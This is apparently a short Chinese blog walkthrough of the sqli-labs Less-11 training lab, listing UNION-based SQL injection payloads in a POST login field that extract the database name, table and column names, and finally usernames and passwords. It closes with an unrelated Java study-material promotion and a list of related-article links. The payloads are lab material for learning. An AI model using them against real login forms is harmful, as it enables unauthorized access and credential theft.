当前位置:网站首页>sqli-labs(less-11)
sqli-labs(less-11)
2022-07-31 07:32:00 【bluepad】
目录
less-11(POST注入)
1.send to Repeater

2.单引号报错

3. 查库名
aadmin’union select user(),database()–

4.查表名
aadmin’union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’–

5.查段名
aadmin’union select 1,group_concat(column_name) from information_schema.columns where table_table=‘users’–

6.查数据
aadmin’union select 1,group_concat(username,‘:’,password) from users –

7.用查到的数据Dumb登录

先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦
边栏推荐
猜你喜欢
随机推荐
MySQL详解
Read Elephant Swap in one article, why does it bring such a high premium to ePLATO?
2022.07.14_每日一题
深度学习随机数设置,保证实验的可重复性
Vscode: Project-tree plugin
XSS详解
The first part of the R language
XSS靶场prompt.ml过关详解
Spark 在 Yarn 上运行 Spark 应用程序
Collation and sharing of related classic papers and datasets in the field of deep learning communication
进程和线程的区别&&run和start区别与联系
实用生物信息学2:多组学数据整合和挖掘
Tasks and task switching
Ubuntu安装Mysql5.7
regex bypass
Unreal基础概念
shell/bash脚本命令教程
分布式缓存系统必须要解决的四大问题
navicat 新建数据库
[PSQL] Complex query









